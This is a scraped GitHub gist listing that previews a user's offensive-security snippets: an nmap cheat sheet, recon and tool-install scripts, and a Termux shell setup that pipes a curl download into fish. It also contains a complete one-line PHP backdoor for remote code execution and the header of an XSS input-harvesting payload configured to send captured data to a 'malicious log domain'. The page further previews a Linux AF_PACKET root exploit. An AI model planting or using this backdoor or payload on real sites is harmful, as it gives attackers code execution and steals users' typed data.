Bug report for ..........
-
Install this by this command
apt install example -
Configure this with this
env EXAMPLE=POC -
Run
thisfor exploit
j3rrykh4n
/ Nmap cheat sheet
Created
September 6, 2020 09:34
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| scan target for pentest | |
| nmap -PN -n -A -sS -p- -oN output.nmap <IP> | |
| -Pn : no ping check (host is up), | |
| -n no dns resolution | |
| -A : detect systeme info | |
| -sT : tcp connect [laisse des traces dans les logs serveurs] (moins impactant que -sS Syn, ne laisse pas de trace dans les logs par defaut) | |
| -p- : port de 0-65535 | |
| -oN output.nmap : write utput to file | |
| ajouter un scan udp en parallèle -sU (dns, ipsec ...) |
j3rrykh4n
/ startHunting
Last active
September 25, 2020 23:52
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| mkdir ~/$1 | |
| mkdir ~/$1/spam | |
| mkdir ~/$1/fingerprints | |
| mkdir ~/$1/assets | |
| mkdir ~/$1/urls | |
| mkdir ~/$1/endpoints | |
| mkdir ~/$1/automations |
j3rrykh4n
/ Install.sh
Last active
July 8, 2022 14:10
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| echo "you should die now :3 it'll be take some time" | |
| #@Tomnomnom | |
| go get -u -v github.com/tomnomnom/anew | |
| go get -u -v github.com/tomnomnom/httprobe | |
| go get -u -v github.com/tomnomnom/assetfinder | |
| go get -u -v github.com/tomnomnom/waybackurls | |
| go get -u -v github.com/tomnomnom/fff | |
| go get -u -v github.com/tomnomnom/qsreplace |
j3rrykh4n
/ Xssmalware.js
Created
June 28, 2020 14:07
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* xssmaleware.js | |
| * XSS payload for harvesting user inputs! | |
| * By Anik Hasibul (github.com/AnikHasibul) | |
| * Change the $_config.url as your own | |
| * Only for experimental purpose | |
| */ | |
| var $_config = { | |
| "url":"http://myMaliciousLogDomain.xom/xsslogger.php" /*EDIT THIS MUST */ | |
| } |
j3rrykh4n
/ Backdoor.php
Last active
June 28, 2020 10:45
The tiniest PHP malware/backdoor for Remote Code Execution. Author hasibul hasan
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php $_GET["f"]($_GET["p"]); ?> | |
j3rrykh4n
/ BugReportTemplate.md
Created
June 28, 2020 10:34
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Technology | |
| Subdomain Enumeration: | |
| # Basic usage | |
| subfinder -d example.com > example.com.subs | |
| # Recursive | |
| subfinder -d example.com -recursive -silent -t 200 -v -o example.com.subs |
j3rrykh4n
/ chocobo_root.c
Created
March 18, 2020 23:35
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| chocobo_root.c | |
| linux AF_PACKET race condition exploit | |
| exploit for Ubuntu 16.04 x86_64 | |
| vroom vroom | |
| *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*= | |
| user@ubuntu:~$ uname -a | |
| Linux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux | |
| user@ubuntu:~$ id |
j3rrykh4n
/ Fish shell for termux
Last active
June 19, 2019 16:43
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| pkg install fish | |
| pkg install curl | |
| curl -L https://get.oh-my.fish | fish | |
| curl -L https://get.oh-my.fish > install | |
| fish install --path=~/.local/share/omf --config=~/.config/omf | |
| omf install bobthefish |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| export GOROOT="/data/data/com.termux/files/usr/lib/go" | |
| export GOPATH=$HOME/storage/storage/sdcard0/htdocs/go/ | |
| export PATH=$GOPATH/bin:$GOROOT/bin:$PATH | |
| ~ |
NewerOlder